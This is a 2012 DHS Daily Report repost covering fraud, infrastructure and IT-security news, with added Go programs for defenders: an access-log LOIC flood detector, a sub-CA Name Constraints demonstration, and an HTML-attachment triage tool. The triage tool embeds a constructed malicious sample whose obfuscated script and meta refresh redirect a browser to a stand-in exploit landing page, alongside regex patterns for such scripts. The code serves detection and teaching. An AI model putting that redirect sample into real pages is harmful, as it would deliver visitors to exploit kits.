Wednesday, February 22, 2012

Complete DHS Daily Report for February 22, 2012

Daily Report

Top Stories

• Bank of New York Mellon Corp., the world’s largest custody bank, defrauded clients of more than $1.5 billion through foreign-exchange trades, according to a new complaint filed by the U.S. government. – Bloomberg. See item 23 below in the Banking and Finance Sector.

• A failure of the cable support system on the Martin Olav Sabo Bridge in Minneapolis, Minnesota, resulted in the bridge’s closure and led to light-rail and traffic disruptions for at least 3 days. – Minneapolis Star Tribune (See item 26)

26. February 21, Minneapolis Star Tribune – (Minnesota) Hiawatha light-rail service suspended, road and bridge closed. A failure of the cable support system February 19 on the Martin Olav Sabo Bridge in Minneapolis, Minnesota, resulted in the bridge’s closure, the suspension of light-rail service at three stops, and the rerouting of vehicle traffic. The cable broke loose from the top of the span and fell about 100 feet onto the bridge. Safety concerns prompted the bridge’s closure, re-routing traffic, interrupting Hiawatha light-rail service, and sending more than 20 city workers on overtime to shore up the bridge. The disruptions continued into February 21. The bridge’s most recent inspection took place September 2011 but showed nothing “that got anyone’s attention,” said the director of transportation, maintenance, and repair for Minneapolis Public Works. He said a pedestrian came across a cable February 19 and reported it to the city. The bridge’s design consultant was San Francisco-based URS Corp., an engineering firm that consulted on the Interstate 35W bridge that collapsed in 2007. Thirteen people died and 145 were injured after its rush-hour collapse into the Mississippi River. A spokesman for URS said the firm is working with local officials “to evaluate the safety and stability of the bridge so that light rail service through the area may resume and Hiawatha Avenue be reopened.” Source:


Banking and Finance Sector

17. February 20, KPAX 8 Missoula; KAJJ 18 Kalispell – (Montana) Cornerstone Ponzi scheme defendant set to plead guilty. A Polson, Montana man who was accused in the largest Ponzi scheme in Montana history is set to plead guilty February 22. He is one of two men implicated in the scheme to rip off investors in connection with Cornerstone Financial, which the state named in an investigation more than 3 years ago. The state said the pair bilked investors out of more than $14 million, starting in 2005. Under terms of the plea agreement, prosecutors said the man will admit to 1 count of mail fraud, 1 count of wire fraud, and 14 counts of money laundering. The government initially accused the man of 23 counts of money laundering. The man faces up to 10 years in prison and several hundred thousand dollars in fines as well as forfeiting more than $1.3 million to the government. Source:

18. February 20, Ventura County Star – (California) Three more plead guilty in federal mortgage fraud cases. Three guilty pleas entered in a California court February 16 closed the book on nearly all of the 14 federal mortgage fraud cases filed 2 years ago after local real estate professionals reported the shady business practices. The three guilty pleas add to eight others in connection with the matter, dubbed “Operation Stolen Dreams” in June 2010 when it was publicized by the U.S. Justice Department. It involved 1,215 criminal defendants across the country and uncovered more than $2.3 billion in losses. In Ventura County, 2 indictments charged 14 people with filing fraudulent loan applications that caused banks to fund at least $35 million in mortgages. Crimes were said to have taken place during the California real estate boom — from 6 or 7 years ago through early 2009. Some of the victims were recruited in public-housing tracts. Many spoke little English and barely made minimum wage. The accusations said paperwork was falsified to show inflated figures for the buyers’ income and assets. Source:

19. February 20, WTVT 13 Tampa – (Florida) ATMs raided with stolen card numbers. Police in Tampa, Florida, are trying to identify two, possibly three, men who stole thousands of dollars from the bank accounts of strangers, WTVT 13 Tampa reported February 20. Police said one of the unknown men stood at a Bank of America machine January 22 for up to 30 minutes, inserting card after card. Each time, the suspect withdrew the maximum amount of money possible. The thieves used ATMs at four different Tampa banks January 22, mostly downtown. They had obtained debit card numbers and the matching PINs, and used that information to manufacture their own counterfeit cards. Source:

20. February 20, Softpedia – (International) Royal Navy, Federal Reserve and other sites hacked by D35m0nd142. A German grey hat hacker managed to breach the official Web site of the Royal Navy and the U.S. Federal Reserve bank after finding an SQL injection vulnerability, Softpedia reported February 20. “The admins have been warned immediately before of this post. The vulnerable ‘parameter’ has been obscured to prevent damages from others,” the hacker wrote on Pastebin. The hacker found 47 blind SQL injection flaws on the official Web site of the U.S. Federal Reserve. The hacker took a peek at the security measures implemented by Arizona University, Stanford University, and an education institution in Hong Kong. In most of the cases, the site’s administrators were notified before the hacker published his proof-of-concepts. It is uncertain how many of the breached sites patched their vulnerabilities. Source:

21. February 19, Wired – (International) Feds seize $50 million in Megaupload assets, lodge new charges. The authorities said February 17 they seized $50 million in Megaupload-related assets and added additional charges, including conspiracy to commit money laundering, in one of the United States’ largest criminal copyright infringement prosecutions. Megaupload, the popular file-sharing site, was shuttered in January and its top officials indicted by the Justice Department. The government said Megaupload’s “estimated harm” to copyright holders was “well in excess of $500 million.” The new charges levied February 17 allege Megaupload falsely represented to rights holders that it removed infringing works from its servers. The superseding indictment in the Eastern District of Virginia also claims Megaupload paid one of its registered users $3,400 between 2008 and 2009 for uploading 16,960 files that generated 34 million views. The files included copyrighted motion pictures, the government said. The government also said despite claims of having 180 million registered users, the site had 66.6 million. The authorities said 5.86 million of these registered users uploaded files, “demonstrating that more than 90 percent of their registered users only used the defendant’s system to download.” Source:

22. February 17, Cypress Creek Mirror – (Texas) Deputies arrest suspected serial bandit. February 16, deputies arrested a woman they believe to be responsible for at least five bank robberies in northwest Harris County, Texas. The latest robbery happened at a Capital One Bank around 4 p.m. February 16. According to authorities, a woman entered the bank and handed the teller a note demanding money. Deputies arrested the woman as she left with the money. She was also reportedly found with a wig and gun. December 28, 2011, the FBI said a woman entered a Capital One bank in Houston and handed the teller a threatening note demanding money. In another robbery committed December 16, 2011, at a Capital One bank, the woman told the teller she wanted more when she received the cash. The teller explained there was no more, and the robber left. The woman may also be linked to robberies of a Capital One bank and a Compass bank in November 2011. Source:

23. February 17, Bloomberg – (New York) Bank of New York accused of $1.5 billion fraud in amended U.S. complaint. Bank of New York Mellon Corp., the world’s largest custody bank, defrauded clients of more than $1.5 billion through foreign-exchange trades, according to a new complaint filed February 16 by the U.S. government. The bank “repeatedly lied” about a service for foreign currency transactions and defrauded clients, including pension funds and federally insured financial institutions of more than $1.5 billion, the U.S. attorney’s office in Manhattan said in an amended complaint. The government’s lawsuit is one of several brought against the bank, including one by the New York attorney general, alleging it defrauded clients through its so-called standing instruction foreign-exchange service. In the first complaint filed in October 2011, the U.S. attorney’s office said the bank defrauded clients of “hundreds of millions of dollars.” Part of the lawsuit was resolved under an agreement approved in January. Source:

24. February 17, Wired – (International) Goldman Sachs code-theft conviction reversed. A federal appeals court in New York City February 17 reversed the conviction of a former Goldman Sachs programmer sentenced to 8 years for stealing the bank’s high-speed trading software. The programmer was convicted in 2010 of theft of trade secrets under the Economic Espionage Act. The Russian-born man worked for Goldman Sachs until June 2009, when authorities said he siphoned source code for the company’s valuable software on his way out the door to take a new job with another company. The appellate court reversed the conviction without explanation, and ordered the man freed on $750,000 bond. Authorities alleged the former Goldman vice president stole “hundreds of thousands of lines” of source code. They alleged he downloaded various software from the Goldman Sachs network and transferred it to a storage Web site hosted in Germany, before trying to erase his tracks. He allegedly used a script to copy, compress, encrypt, and rename files. Once the data was transferred, the program used to encrypt the files was erased, and he attempted to delete the bash (shell) history on the network host that recorded his activity. Prosecutors said he made several copies of the code and had it on his laptop when he flew to Chicago to meet his new employers at Teza Technologies. Source:

For another story, see item 44 below in the Information Technology Sector.

Information Technology

42. February 21, Softpedia – (International) LOIC DDOS attack tool migrated to Android. The Low Orbit Ion Cannon (LOIC) is a popular denial-of-service tool used by hackers who want to take down particular Web sites. Recently, researchers have seen myriad variants, including the JavaScript-powered version that allows inexperienced hackers to attack sites. Now, researchers have come across a version designed for Android users. McAfee experts report the tool was first advertised by Anonymous Argentina, with the hacktivists urging supporters to download the application to aid their cause. This version of WebLOIC for Android is not something developed from scratch. The hackers instead easily ported the Web application using a free online service that creates Android apps from a URL or a piece of HTML code. Further analysis has allowed researchers to determine it is programmed to send 1,000 HTTP requests with one of the parameters being the message “We are LEGION.” McAfee identified this tool as Android/DIYDoS and cataloged it as being a potentially unwanted program. Source:
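The tool leaves an obvious fingerprint in a web server's access log: a burst of near-identical GET requests from one client, every one carrying the "We are LEGION" string. The Go program below is an added example written for this page, not McAfee's analysis code or the hacktivists' tool. It reads combined-format log lines, keeps the requests whose query string carries the marker as the value of any parameter (the parameter name "msg" in the sample is an assumption; the report does not name it), and reports every source that exceeds a request threshold inside a sliding time window. The log lines are constructed for the example using RFC 5737 test addresses.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"sort"
	"strings"
	"time"
)

// Marker is the string the Android WebLOIC build sends in a query parameter of every
// request, per the McAfee analysis. The parameter name is an assumption (the report does
// not give it), so the detector matches the decoded value under any key.
const Marker = "We are LEGION"

// Combined log format: client IP, two ignored fields, [timestamp], "METHOD path proto".
var logLine = regexp.MustCompile(`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"`)

// SampleLog is constructed for this example (RFC 5737 addresses); it is not data from the report.
const SampleLog = `203.0.113.7 - - [21/Feb/2012:14:03:01 +0000] "GET /?id=1329832981001&msg=We+are+LEGION HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 2.3.6)"
203.0.113.7 - - [21/Feb/2012:14:03:01 +0000] "GET /?id=1329832981002&msg=We+are+LEGION HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 2.3.6)"
203.0.113.7 - - [21/Feb/2012:14:03:02 +0000] "GET /?id=1329832981003&msg=We+are+LEGION HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 2.3.6)"
198.51.100.9 - - [21/Feb/2012:14:03:02 +0000] "GET /login?user=bob HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Feb/2012:14:03:02 +0000] "GET /?id=1329832981004&msg=We+are+LEGION HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 2.3.6)"
203.0.113.7 - - [21/Feb/2012:14:03:03 +0000] "GET /?id=1329832981005&msg=We+are+LEGION HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Linux; Android 2.3.6)"
192.0.2.44 - - [21/Feb/2012:14:05:40 +0000] "GET /?id=1&msg=We%20are%20LEGION HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
`

type hit struct {
	ip string
	at time.Time
}

// parseHits returns one hit per request whose query string carries the marker in any parameter.
func parseHits(log string) ([]hit, error) {
	var hits []hit
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		m := logLine.FindStringSubmatch(sc.Text())
		if m == nil {
			continue // not a request line in the expected format
		}
		u, err := url.Parse(m[4])
		if err != nil {
			continue
		}
		marked := false
		for _, vals := range u.Query() { // Query() decodes '+' and %20 alike
			for _, v := range vals {
				marked = marked || strings.EqualFold(v, Marker)
			}
		}
		if !marked {
			continue
		}
		at, err := time.Parse("02/Jan/2006:15:04:05 -0700", m[2])
		if err != nil {
			return nil, err
		}
		hits = append(hits, hit{ip: m[1], at: at})
	}
	return hits, sc.Err()
}

// FloodSources returns, sorted, each client IP that sent at least threshold marked requests
// within any span of length window. The tool fires 1,000 requests from a single page view,
// so even a low threshold separates it from a lone visitor who opened the attack URL once.
func FloodSources(log string, threshold int, window time.Duration) ([]string, error) {
	hits, err := parseHits(log)
	if err != nil {
		return nil, err
	}
	byIP := map[string][]time.Time{}
	for _, h := range hits {
		byIP[h.ip] = append(byIP[h.ip], h.at)
	}
	var flooders []string
	for ip, ts := range byIP {
		sort.Slice(ts, func(i, j int) bool { return ts[i].Before(ts[j]) })
		start := 0 // sliding window over the sorted timestamps
		for end := range ts {
			for ts[end].Sub(ts[start]) > window {
				start++
			}
			if end-start+1 >= threshold {
				flooders = append(flooders, ip)
				break
			}
		}
	}
	sort.Strings(flooders)
	return flooders, nil
}

func main() {
	src, err := FloodSources(SampleLog, 5, 10*time.Second)
	fmt.Println("flood sources:", src, "error:", err)
}
```

Matching on the decoded parameter value rather than a fixed key survives the trivial variants (a different key name, `%20` instead of `+`); a rename of the message itself would not be caught, so in practice pair this with a plain per-source request-rate rule.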

43. February 20, IDG News Service – (International) Mozilla gives CAs a chance to come clean about certificate policy violations. Mozilla asked all certificate authorities (CAs) to revoke subordinate CA certificates currently used for corporate secure sockets layer (SSL) traffic management, offering an amnesty to CAs who breached Mozilla’s conditions for having their root certificates ship with its products, IDG News Service reported February 20. The request comes after Trustwave recently admitted to issuing a sub-CA certificate to a private firm for use in a data loss prevention system. Sub-CA keys can be used to sign SSL certificates for any domain name on the Internet, which makes them dangerous if they fall in the wrong hands. Even though Trustwave argued the sub-CA key was stored in a hardware security module (HSM), making it irretrievable, the fact that such a powerful certificate was issued to a private company that was not a certificate authority represents a violation of Mozilla’s policy. CAs voluntarily adhere to Mozilla’s CA Certificate Policy to have their root keys included by default in Firefox, Thunderbird, and other products. Because there is reason to believe multiple CAs engage in this type of behavior, Mozilla decided to offer everyone a one-time chance to come clean about it without risking repercussion. Mozilla made its amnesty offer in an e-mail to all CAs February 17, asking them to revoke sub-CA certificates used for SSL man-in-the-middle interception or traffic management and to destroy the corresponding HSMs. CAs have until April 27 to comply with these requests. If such certificates are found after that date, the issuing CAs will face punishments including the removal of their root keys from Mozilla’s products. Source:
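Why an unconstrained sub-CA is so dangerous, and what the narrower alternative looks like, can be shown with Go's standard library alone. The program below is an added example for this page, not Mozilla's or Trustwave's code. It builds a root, a subordinate CA and a leaf certificate for an arbitrary host, then validates the leaf the way a client that trusts only the root would. With no Name Constraints on the sub-CA, a leaf for www.example.com validates, which is exactly the interception capability the article describes; when the sub-CA carries a critical Name Constraints extension limiting it to corp.example, the same leaf is rejected while mail.corp.example still passes. All names (Demo Root CA, Demo Corp Sub-CA, corp.example) are made up for the demonstration.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

var serial int64 // demo-only counter; a production CA uses random serials

func nextSerial() *big.Int {
	serial++
	return big.NewInt(serial)
}

// issueCA returns a CA certificate and its key; with parent == nil it self-signs a root.
// A non-empty permitted list becomes a critical Name Constraints extension, the X.509
// control that would confine a customer-held sub-CA to the customer's own domains.
func issueCA(cn string, permitted []string, parent *x509.Certificate, parentKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber:                nextSerial(),
		Subject:                     pkix.Name{CommonName: cn},
		NotBefore:                   time.Now().Add(-time.Hour),
		NotAfter:                    time.Now().Add(24 * time.Hour),
		IsCA:                        true,
		BasicConstraintsValid:       true,
		KeyUsage:                    x509.KeyUsageCertSign | x509.KeyUsageCRLSign,
		PermittedDNSDomains:         permitted,
		PermittedDNSDomainsCritical: len(permitted) > 0,
	}
	if parent == nil {
		parent, parentKey = tmpl, key // self-signed root
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, &key.PublicKey, parentKey)
	if err != nil {
		return nil, nil, err
	}
	cert, err := x509.ParseCertificate(der)
	return cert, key, err
}

// issueLeaf mints a server certificate for host under ca. Nothing in the certificate format
// stops any CA key from doing this for any host; only constraints on the CA itself can.
func issueLeaf(host string, ca *x509.Certificate, caKey *ecdsa.PrivateKey) (*x509.Certificate, error) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	tmpl := &x509.Certificate{
		SerialNumber: nextSerial(),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey)
	if err != nil {
		return nil, err
	}
	return x509.ParseCertificate(der)
}

// VerifyForgedLeaf builds root -> sub-CA -> leaf-for-host and validates the leaf as a client
// trusting only the root. nil means an interception certificate for host would be accepted.
// permitted is the sub-CA's DNS name constraint; nil reproduces the unconstrained case.
func VerifyForgedLeaf(host string, permitted []string) error {
	root, rootKey, err := issueCA("Demo Root CA", nil, nil, nil)
	if err != nil {
		return err
	}
	sub, subKey, err := issueCA("Demo Corp Sub-CA", permitted, root, rootKey)
	if err != nil {
		return err
	}
	leaf, err := issueLeaf(host, sub, subKey)
	if err != nil {
		return err
	}
	roots, inters := x509.NewCertPool(), x509.NewCertPool()
	roots.AddCert(root)
	inters.AddCert(sub)
	_, err = leaf.Verify(x509.VerifyOptions{DNSName: host, Roots: roots, Intermediates: inters})
	return err
}

func main() {
	fmt.Println("unconstrained sub-CA, www.example.com:", VerifyForgedLeaf("www.example.com", nil))
	fmt.Println("sub-CA limited to corp.example, www.example.com:", VerifyForgedLeaf("www.example.com", []string{"corp.example"}))
	fmt.Println("sub-CA limited to corp.example, mail.corp.example:", VerifyForgedLeaf("mail.corp.example", []string{"corp.example"}))
}
```

The caveat a practitioner should keep in mind: not every TLS client of the period enforced Name Constraints, so the extension is a control the issuing CA applies to limit the damage, not a substitute for never handing an unconstrained sub-CA to a non-CA in the first place, which is what Mozilla's request addresses.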

44. February 17, ZDNet – (International) Cutwail botnet resurrects, launches massive malware campaigns using HTML attachments. Security researchers from M86 Security are attributing the increase in malware campaigns that use HTML attachments to the resurrection of the Cutwail botnet, which is responsible for “spamvertising” these campaigns, ZDNet reported February 17. Using the company’s sensor network, the researchers observed three peaks of “spamvertised” malicious campaigns that used HTML attachments to serve client-side exploits to unsuspecting users. The campaigns include the FDIC “Suspended bank account” spam campaign, the “End of August Statement” spam campaign, and the “Xerox Scan” spam campaign. Once the user downloads and opens the malicious attachment, embedded JavaScript redirects the browser to a client-side exploit URL that is part of a malicious network currently relying on the Phoenix Web exploit kit. Once the researchers obtained access to the command and control interface of the exploit kit, they noticed the majority of requests arrived with a blank referrer, meaning they came from home and corporate users opening the malicious attachments from their own computers rather than following a link from a Web page. Source:
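The delivery mechanism here is an HTML file that, when opened from disk, redirects the browser to the exploit-kit landing page; the blank referrer the researchers saw is the natural side effect of a page loaded from a local file. A mail gateway or incident responder can triage such attachments statically, without rendering them. The Go program below is an added example written for this page; it is not M86 Security's tooling and not a signature for the real Cutwail attachments, whose contents the report does not reproduce. It flags meta-refresh redirects, hidden iframes, script that assigns `location` or calls `window.open`, and common obfuscation (`eval`, `unescape`, `String.fromCharCode`, runs of percent- or hex-escaped bytes). The two sample documents are constructed for the example, with an RFC 5737 address standing in for the landing page.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Triage heuristics for a mail-borne HTML file. A statement or scan notification has no
// reason to navigate the browser elsewhere on open, so redirect machinery is itself a signal.
var (
	scriptBlock = regexp.MustCompile(`(?is)<script[^>]*>(.*?)</script>`)
	metaRefresh = regexp.MustCompile(`(?i)<meta[^>]+http-equiv\s*=\s*["']?refresh`)
	hiddenFrame = regexp.MustCompile(`(?is)<iframe[^>]*((width|height)\s*=\s*["']?0\b|visibility\s*:\s*hidden|display\s*:\s*none)`)
	redirectJS  = regexp.MustCompile(`(?i)\blocation(\.href|\.replace|\.assign)?\s*[=(]|window\.open\s*\(`)
	obfuscation = regexp.MustCompile(`(?i)\beval\s*\(|\bunescape\s*\(|String\.fromCharCode|document\.write\s*\(|\\x[0-9a-f]{2}|(%[0-9a-f]{2}){4}`)
)

// Verdict lists the distinct indicators found; Suspicious is set when any fired.
type Verdict struct {
	Indicators []string
	Suspicious bool
}

// Triage inspects the raw HTML of an attachment without rendering or executing it.
func Triage(html string) Verdict {
	seen := map[string]bool{}
	var ind []string
	add := func(s string) {
		if !seen[s] {
			seen[s] = true
			ind = append(ind, s)
		}
	}
	if metaRefresh.MatchString(html) {
		add("meta refresh redirect")
	}
	if hiddenFrame.MatchString(html) {
		add("hidden iframe")
	}
	for _, m := range scriptBlock.FindAllStringSubmatch(html, -1) {
		if redirectJS.MatchString(m[1]) {
			add("script navigates (location assignment or window.open)")
		}
		if obfuscation.MatchString(m[1]) {
			add("obfuscated script (eval/unescape/fromCharCode/escaped bytes)")
		}
	}
	return Verdict{Indicators: ind, Suspicious: len(ind) > 0}
}

// MaliciousSample is constructed for this example: a decoy message, a meta refresh, and a
// script that decodes the landing-page URL (unescape of "http://198.51.100.23/in.php") and
// navigates to it after a short delay. It is not a real Cutwail attachment.
const MaliciousSample = `<html><head><meta http-equiv="refresh" content="5;url=http://198.51.100.23/in.php"></head>
<body>Your scanned document is being prepared...
<script type="text/javascript">
var u=unescape("%68%74%74%70%3a%2f%2f%31%39%38%2e%35%31%2e%31%30%30%2e%32%33%2f%69%6e%2e%70%68%70");
setTimeout(function(){ window.location.replace(u); }, 1500);
</script></body></html>`

// BenignSample is a constructed static notification with no script at all.
const BenignSample = `<html><body><h1>Monthly statement</h1><p>Your statement is attached as a PDF.</p></body></html>`

func main() {
	for name, doc := range map[string]string{"malicious": MaliciousSample, "benign": BenignSample} {
		v := Triage(doc)
		fmt.Printf("%s: suspicious=%v indicators=[%s]\n", name, v.Suspicious, strings.Join(v.Indicators, "; "))
	}
}
```

Static pattern matching of this kind is a triage filter, not a verdict: heavily packed scripts can hide the `location` assignment behind string building that only a JavaScript engine (or a sandboxed browser) would expose, so a hit routes the file to dynamic analysis and a miss does not clear it.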

45. February 17, Softpedia – (International) Memory corruption vulnerability found in Skype 5.6.59.x. Vulnerability Lab researchers identified a high-risk memory corruption flaw that affects the 5.6.59.x versions of Skype, Softpedia reported February 17. By exploiting this flaw, an attacker could remotely crash a computer running Windows 7 by sending a file from a Linux client. The experts demonstrated this vulnerability, found in the file transfer module, by sending a file from Skype v2.2.0.35 Beta for Linux to a contact running Skype on a Windows 7 x64 operating system. The transfer resulted in a stable memory corruption on the Windows client side. “The vulnerability can be exploited by remote attackers with low required user interaction (accept). Successful exploitation requires to accept a file transfer (user interaction) or receive messages & information,” Vulnerability Lab representatives told Softpedia. According to the researchers, the flaw was triggered only on Acer Aspire 5738 notebooks powered by an Intel Core 2 Duo T6600 processor and running Windows 7 x64. The bug was reproduced 4 out of 11 times, its successful triggering resulting in a software and context freeze and an access violation message. The vulnerability was identified and reported to Skype in November 2011, with the vendor responding 2 days later. The issue was addressed between November 9 and February 17, and the current Skype release likely incorporates the fix. Vulnerability Lab researchers also identified a buffer overflow vulnerability in Yahoo! Messenger, and they showed how an attacker can make Google+ posts on a user’s behalf by tricking him into playing a game. Source:

46. February 17, H Security – (International) Vulnerability in libpng prompts Firefox and Thunderbird updates. The Mozilla Project has released updates to Firefox and Thunderbird, H Security reported February 17. According to the release notes, the version 10.0.2 updates to the open source Web browser and the news and e-mail client address a security vulnerability. As of February 17, however, the project’s security pages provided no details on what was fixed. These releases came soon after a Chrome update that closed 13 security holes and took the version number to 17.0.963.56. One forum discussion suggests a single vulnerability was the reason for the “chemspill” Firefox and Thunderbird updates. One forum entry refers to an integer overflow in libpng, the official PNG reference library. Firefox bug number 727401 is currently restricted and not publicly viewable on the Bugzilla system. It corresponds to a bug Google paid a researcher for discovering, which concerns decompressing PNG files. According to the comments in the Chromium code, the bug can cause an integer overflow or truncation. It is currently unknown whether the vulnerability is being actively exploited in the wild. All versions of libpng since 1.2.8 appear to be affected. According to an advisory from Secunia, exploitation could result in execution of arbitrary code on a victim’s system when viewing a specially crafted PNG image in an affected browser. Source:

47. February 17, Computerworld – (International) Apple’s new OS X tightens screws on some malware. Apple will introduce a new Mac security model with OS X Mountain Lion this summer that by default lets users install only programs downloaded from the Mac App Store or those digitally signed by a registered developer, Computerworld reported February 17. Some experts called Gatekeeper — Apple’s name for the model and technology — a game-changer while others criticized it as less than watertight. Gatekeeper will block the installation of the most common kind of Mac malware yet: trojan horses unwittingly executed by users who have been duped into downloading and installing fake software. Source:

For more stories, see items 20, 21, and 24, above in the Banking and Finance Sector and 50 below in the Communications Sector.

Communications Sector

48. February 20, WWLP 22 Chicopee – (Massachusetts) Phone service returned in Huntington. Landline telephone service was completely restored to residents of Huntington, Massachusetts, WWLP 22 Chicopee reported February 20. Phone service in that area was knocked out when an alleged hit-and-run driver took out a utility pole on Route 112. Residents and businesses were without service for 2 days, and Verizon workers initially thought it could take up to 5 days before everyone had telephone service again. However, by 6 p.m. February 19, everyone was back online. Source:

49. February 18, WTOV 9 Steubenville – (Ohio) Missing cable causes telephone outage in Jefferson County. Residents in parts of Mingo Junction and Goulds, Ohio, dealt with a telephone outage February 18 after a section of a cable went missing. Area telephone service providers said they were aware of the incident. Jefferson County 911 dispatchers said only landline phone service was affected, but it was unclear when the issue would be resolved. Source:

50. February 18, Mooresville Tribune – (North Carolina) Cable repair ends week of headaches for MI-Connection. A week of frustration and Internet service interruptions for many MI-Connection customers in North Carolina ended February 18 when repair crews completed a complicated splicing of a damaged fiber optic cable spanning Lake Norman. Officials said applications such as video streaming returned to normal just after midnight. February 18, MI-Connection said a cut in a 1,600-foot line running above the N.C. 150 Bridge west of Mooresville occurred February 12 and caused reduced bandwidth and Internet speeds for some customers. The firm’s CEO said one of the company’s two fiber backbone feeds went down when the cable was damaged, possibly by a bullet. System officials notified XO Communications, and a trouble ticket was issued to DukeNet, the carrier XO utilizes. The CEO said whatever struck the cable creased the fiber casing, and subsequent cold weather and moisture triggered the break. The entire line had to be replaced. The CEO said the system’s available bandwidth was reduced by 50 percent by the damaged cable. Even before the incident, MI-Connection had begun the process of adding another “backbone provider” to the two existing vendors, he said. Source:

For more stories, see items 42 and 45 above in the Information Technology Sector.